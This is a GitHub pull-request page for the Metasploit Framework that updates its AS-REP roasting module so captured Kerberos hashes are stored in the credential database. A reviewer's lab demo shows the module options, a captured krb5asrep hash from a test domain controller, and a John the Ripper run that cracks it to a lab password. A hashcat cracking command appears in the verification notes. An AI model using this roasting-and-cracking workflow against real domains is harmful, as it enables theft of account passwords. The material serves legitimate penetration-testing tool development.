Asrep update #20176
Merged
Asrep update #20176
+46
−36
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smashery
force-pushed
the
asrep-update
branch
3 times, most recently
from
15b1609 to
ae5b068
Compare
smcintyre-r7
approved these changes
May 19, 2025
There was a problem hiding this comment.
Changes are LGTM
msf6 auxiliary(gather/asrep) > show options
Module options (auxiliary/gather/asrep):
Name Current Setting Required Description
---- --------------- -------- -----------
Rhostname no The domain controller's hostname
SSL false no Enable SSL on the LDAP connection
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USE_RC4_HMAC true yes Request using RC4 hash instead of default encryption types (faster to crack)
When ACTION is BRUTE_FORCE:
Name Current Setting Required Description
---- --------------- -------- -----------
USER_FILE no File containing usernames, one per line
Used when connecting to LDAP over an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.10 yes The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
LDAPDomain msflab.local no The domain to authenticate to
LDAPPassword Password1! no The password to authenticate with
LDAPUsername smcintyre no The username to authenticate with
RHOSTS 192.168.159.10 yes The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 no The target port
Auxiliary action:
Name Description
---- -----------
LDAP Ask a domain controller directly for the susceptible user accounts
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/asrep) > run
[*] Running module against 192.168.159.10
[email protected]:9b5ff52d7165247a9456718383cd203a$3ebfda868f95d0e7bd08352c7f07644c27976af40102729567d043acaaa15504127df8574e398cf5452b71b9cffc4624e2c070e10c44b29a63322a01fa700efef951c5f5141ca901ec280ec4e7398181ba4ea6e51582f101547b3542a53190063df0cacbdcb739288a0d5332f2f89b7f85811778c346d8ecadd9f66da5605ad46cdc58695ebde4a28715c80d23a8b7f96852daab795259b784976ef2025975578dc0d86566335712910fb9444697ce5857d4044c374c06ed76934dd4caa30fb4cacff3c61abe66c85247a21c4d4612e8a3c37a99645baca464a802fbe8
[+] Query returned 1 result.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > creds -t krb5asrep-rc4 -v
Credentials
===========
host origin service public private realm private_type JtR Format cracked_password
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
192.168.159.10 192.168.159.10 389/tcp (Kerberos) [email protected]:9b5ff52d7165247a9456718383cd203a$3ebfda868f95d0e7bd08352c7f07644c27976af40102729567d043acaaa15504127df8574e398cf5452b71b9cffc4624e2c070e10c44b29a63322a01fa700efef951c5f5141ca901ec280ec4e7398181ba4ea6e51582f101547b3542a53190063df0cacbdcb739288a0d5332f2f89b7f85811778c346d8ecadd9f66da5605ad46cdc58695ebde4a28715c80d23a8b7f96852daab795259b784976ef2025975578dc0d86566335712910fb9444697ce5857d4044c374c06ed76934dd4caa30fb4cacff3c61abe66c85247a21c4d4612e8a3c37a99645baca464a802fbe8 Nonreplayable hash krb5asrep-rc4
msf6 auxiliary(gather/asrep) >
../john/run/john crackme.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Cost 1 (etype) is 23 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:01 DONE 1/3 (2025-05-19 17:37) 0g/s 49091p/s 49091c/s 49091C/s Local1901..Lmsflab1900
Proceeding with wordlist:../john/run/password.lst
Enabling duplicate candidate password suppressor using 256 MiB
Password1! ([email protected])
1g 0:00:00:01 DONE 2/3 (2025-05-19 17:37) 0.7463g/s 69514p/s 69514c/s 69514C/s worldwide..141185
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I pushed an update to bump metasploit-credential using bundle update --conservative metasploit-credential which left nokogiri and other libraries at their current version. If the tests pass, I'll get this landed tomorrow.
Release NotesThis updates the ASREP roasting module ( |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This stores asrep "hashes" into the metasploit DB. Also utilises some of the shared code from #20175.
Requires rapid7/metasploit-credential#190.
Verification
creds -t krb5asrep-rc4, and successfully crack (i.e.hashcat -m 18200 asrep.hcat wordlist)Demo